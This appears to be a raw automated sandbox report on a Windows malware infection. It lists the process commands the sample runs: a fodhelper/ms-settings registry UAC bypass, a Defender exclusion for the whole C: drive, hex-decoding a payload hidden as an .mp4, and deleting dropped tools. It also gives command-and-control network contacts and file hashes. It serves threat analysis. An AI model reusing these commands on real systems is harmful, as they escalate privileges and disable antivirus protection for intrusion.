extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Windows \System32\per.exe
"C:\\Windows \\System32\\per.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Nayjqohr.PIF
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\System32\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\usenvqmgzbi"
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\fukgwbxhnjaweq"
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\hopzxtibjrsbofsmv"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | wealthconsultantmanager.com | udp |
| US | 108.170.55.202:443 | wealthconsultantmanager.com | tcp |
| US | 108.170.55.202:443 | wealthconsultantmanager.com | tcp |
| US | 8.8.8.8:53 | 202.55.170.108.in-addr.arpa | udp |
| MY | 103.186.117.186:2404 | www.ozkol-aluminyum.com | tcp |
| MY | 103.186.117.186:2404 | www.ozkol-aluminyum.com | tcp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
Files
C:\Users\Public\alpha.exe
| MD5 | c5db7b712f280c3ae4f731ad7d5ea171 |
| SHA1 | e8717ff0d40e01fd3b06de2aa5a401bed1c907cc |
| SHA256 | f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba |
| SHA512 | bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89 |
C:\Users\Public\kn.exe
| MD5 | 3f6129c8d136b6775175a28667ae6c46 |
| SHA1 | 6e077884cbf7b31e5d7bc6217363fdad967457db |
| SHA256 | 43a570f7e49436fa2687b82fb870b31c7af346d66e2622b56c03bfea28b88646 |
| SHA512 | 2208acea780df21cc4c227d8f7f60973d54679037ffd0f4f67a7412105a5b9d4abf46d425645e922c859d7bdc3b81e7500ae4aa5d9330dc5fcd8618bc3994ff0 |
C:\Users\Public\xkn.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
| SHA512 | e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ld3bjp0f.pmx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2060-44-0x0000028639940000-0x0000028639962000-memory.dmp
C:\Users\Public\ger.exe
| MD5 | cb185e96a887d9389cd136319c1d90e4 |
| SHA1 | 4779c67e139a6cdc9bcd3bf3ea76dd5d591c48ca |
| SHA256 | ef7d2e4387bc2ff0da05f546a20a159134cb429ecfb1517a655729aed12071eb |
| SHA512 | 4dd966a161a89b792568ec17d890a5495399c55ca813d007f63203477a3c8e3b26becfdbc6c676142594e1a8a3af4f69f5d9378ddd07f992e170b78cae59bfdd |
C:\Users\Public\Ping_c.mp4
| MD5 | 182901dd6c35f6cc65a8c4103d8beddd |
| SHA1 | a52233a6ceb0009ef6284909f4389ed20443d39e |
| SHA256 | 9d77adc9eea50fd91430684ad42ee8e17ff8269366ecbbab65ad5d5c6ba7beb8 |
| SHA512 | 9e790b3907f11cb789a8b9f9d06925ac22b1d2b130da82a6f0e71415e362b3eb8a80627c2a58da12b6c60c56e293c5b5d6bed4b3b630bec7f8a6f4f5ca229a0e |
C:\Windows \System32\per.exe
| MD5 | 23d5f6c1a37bfde53049960b7a9564a6 |
| SHA1 | f7d00c07c3ae15f3a31240d8423cc054d43d6b48 |
| SHA256 | 2b5089d56eb0ec9b2854102b5fe984f5be96756a170cc46774021e36b315edc3 |
| SHA512 | be8d23ee1619c09e5dc6d60e9d6df777a8d3d525cc7ad42dc75fa9756ea3bc1d8684e73e95944b56c640a91ba34db9feb6a2073f79ef41bb04082b84cabeec43 |
C:\Users\Public\Libraries\Ping_c.pif
| MD5 | de5de91a0288d235eccab327f5c506df |
| SHA1 | 1c71bda09faa6a04c6c00c331531af76676511f3 |
| SHA256 | 10297db5ec0a0804324c1b2cda6a0b304cd3a2cf7cc807bf8532a7753e7f8b28 |
| SHA512 | d7448847bdbc1cdd1819debad50f329ac5e946355751ebcbd4acba370be89716f6c75159376339ca78aaadeac97803a087e8703067a5eda1e6d739a09916a068 |
memory/3312-74-0x0000000000400000-0x00000000004F9000-memory.dmp
memory/4640-82-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-86-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-85-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-80-0x0000000004410000-0x0000000005410000-memory.dmp
memory/4640-87-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-88-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-89-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-91-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-90-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-93-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2832-95-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2832-99-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4752-104-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4752-101-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4460-100-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2832-97-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4460-98-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4752-102-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4460-96-0x0000000000400000-0x0000000000462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\usenvqmgzbi
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
memory/4640-109-0x0000000016490000-0x00000000164A9000-memory.dmp
memory/4640-113-0x0000000016490000-0x00000000164A9000-memory.dmp
memory/4640-112-0x0000000016490000-0x00000000164A9000-memory.dmp
memory/4640-114-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-118-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-119-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\sw3ew\logs.dat
| MD5 | da080cba4f22367fda140697606b7ff1 |
| SHA1 | 5446b25860728376b7c4db24a8f3776caed91fe6 |
| SHA256 | 176c48f3e28dd39ae8ed5097cf60b8c2519cc7152649d8671db0abb1af40ae1e |
| SHA512 | 50acf6506bf086950c71590232c8763ade084f30be9557719c8252b63e6b81c7809e6d318ce6350b8f067822bca4a979ac99df4b1d7216614bf50ea76b15ebcb |
memory/4640-126-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-134-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-143-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4640-142-0x0000000000400000-0x0000000000482000-memory.dmp